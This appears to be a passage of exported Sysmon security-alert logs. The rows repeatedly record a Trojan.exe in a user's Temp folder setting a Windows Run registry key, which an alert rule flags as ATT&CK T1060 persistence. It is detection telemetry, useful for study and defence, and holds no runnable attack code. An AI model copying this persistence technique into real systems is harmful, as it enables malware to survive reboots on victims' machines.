HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:16.705"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:27.867",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:15.689 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:15.693999700Z"",""eventRecordID"":""1471"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:15.689\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:15.689"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:27.824",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:14.674 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:14.695449900Z"",""eventRecordID"":""1469"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:14.674\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:14.674"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:26.959",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:13.643 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:13.659712000Z"",""eventRecordID"":""1467"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:13.643\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:13.643"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:25.759",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:12.627 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:12.632917700Z"",""eventRecordID"":""1466"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:12.627\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:12.627"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:24.755",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:11.611 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:11.614035500Z"",""eventRecordID"":""1465"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:11.611\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:11.611"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:23.757",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:10.596 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:10.602232800Z"",""eventRecordID"":""1463"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:10.596\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:10.596"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:22.834",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:09.580 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:09.584759100Z"",""eventRecordID"":""1462"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:09.580\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:09.580"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:21.756",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:08.564 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:08.566185900Z"",""eventRecordID"":""1459"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:08.564\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:08.564"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:20.756",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:07.549 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:07.552228100Z"",""eventRecordID"":""1457"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:07.549\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:07.549"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:19.646",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:06.517 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:06.526841900Z"",""eventRecordID"":""1456"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:06.517\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:06.517"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:18.662",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:05.502 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:05.504261000Z"",""eventRecordID"":""1454"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:05.502\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
